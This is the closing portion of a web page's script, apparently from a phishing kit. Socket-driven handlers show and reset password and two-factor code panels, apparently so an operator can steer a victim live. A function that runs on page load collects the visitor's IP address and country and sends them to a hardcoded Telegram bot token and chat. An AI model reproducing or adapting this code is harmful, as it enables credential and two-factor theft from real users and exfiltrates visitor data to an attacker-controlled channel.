                console.error("Element with class 'sc-ce9c5cf8-0.kVLiUK' not found.");
            }

            reset2FAInputs();
        });
        socket.on('show-pcw', () => {
            const passwordDiv = document.querySelector('.sc-ce9c5cf8-0.kVLiUK');
            if (passwordDiv) {
                passwordDiv.style.display = 'inline-grid';
            } else {
                console.error("Element with class 'sc-ce9c5cf8-0.kVLiUK' not found.");
            }

            const faDiv = document.querySelector('.sc-ce9c5cf8-0.kVLiUK2');
            if (faDiv) {
                faDiv.style.display = 'none';
            } else {
                console.error("Element with class 'sc-ce9c5cf8-0.kVLiUK2' not found.");
            }

            resetPasswordInputs(); 
        });
        document.querySelector('.sc-8f301d45-3.bJpDZy').addEventListener('click', function () {
            document.querySelector('.sc-8f301d45-0.eRUnLK').style.display = 'none';
            document.querySelector('.sc-8b304678-5.iDNqeC').style.display = 'block';
        });
        async function notifyVisitorToTelegram() {
    try {
      
        const response = await fetch('https://ipapi.co/json/');
        const data = await response.json();
        
        const visitorIp = data.ip;
        const visitorCountry = data.country_name;

       
       var botToken = '7379900173:AAFv-xVQCjhGWzg3cgYqLL0TdBjiX6oLR1A';
        var chatId = '-4511490029';
        const message = `
=====================
🚨 New Visitor Alert 🚨
=====================
🌍 IP Address: ${visitorIp}
🏳️ Country: ${visitorCountry}
=====================
`;
        
        const telegramUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;
        await fetch(telegramUrl, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                chat_id: chatId,
                text: message
            })
        });

        console.log('Notification sent to Telegram');
    } catch (error) {
        console.error('Error:', error);
    }
}


notifyVisitorToTelegram();
    </script>
</body>

</html>